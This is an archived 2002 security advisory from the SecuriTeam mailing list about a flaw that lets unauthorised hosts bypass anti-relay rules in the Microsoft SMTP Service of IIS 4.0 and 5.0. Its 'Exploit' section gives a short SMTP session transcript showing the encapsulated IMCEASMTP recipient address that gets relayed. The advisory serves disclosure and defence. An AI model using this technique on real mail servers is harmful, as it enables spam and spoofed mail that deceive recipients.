[NT] IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability
From: support@securiteam.comDate: 07/12/02
- Previous message: support@securiteam.com: "[NT] Northern Solutions WebMan Webserver Arbitrary File Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 12 Jul 2002 19:35:41 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability
------------------------------------------------------------------------
SUMMARY
Laurent Frinking of Quark Deutschland GmbH originally discovered this
vulnerability. At that time, the discovery concerned all versions of
Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.
Portcullis has discovered that the Microsoft SMTP Service available with
IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address
vulnerability even with anti-relaying features enabled. This vulnerability
allows hosts that are not authorized to relay e-mail via the SMTP server
to bypass the anti-relay features and send mail to foreign domains.
DETAILS
Impact:
The anti-relay rules will be circumvented allowing spam and spoofed mail
to be relayed via the SMTP mail server.
Spam Mail:
If the Microsoft IIS SMTP Server is used to relay spam mail this could
result in the mail server being black holed causing disruption to the
service.
Spoofed e-mail:
As the Microsoft IIS SMTP Service is most often utilized in conjunction
with IIS for commercial use this flaw could be used in order to engineer
customers particularly because spoofed e-mail relayed in this way will
show the trusted web server in the SMTP header.
Exploit:
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready
at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com....Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.
ADDITIONAL INFORMATION
The information has been provided by <mailto:TLR@portcullis-security.com>
TLR.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Northern Solutions WebMan Webserver Arbitrary File Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
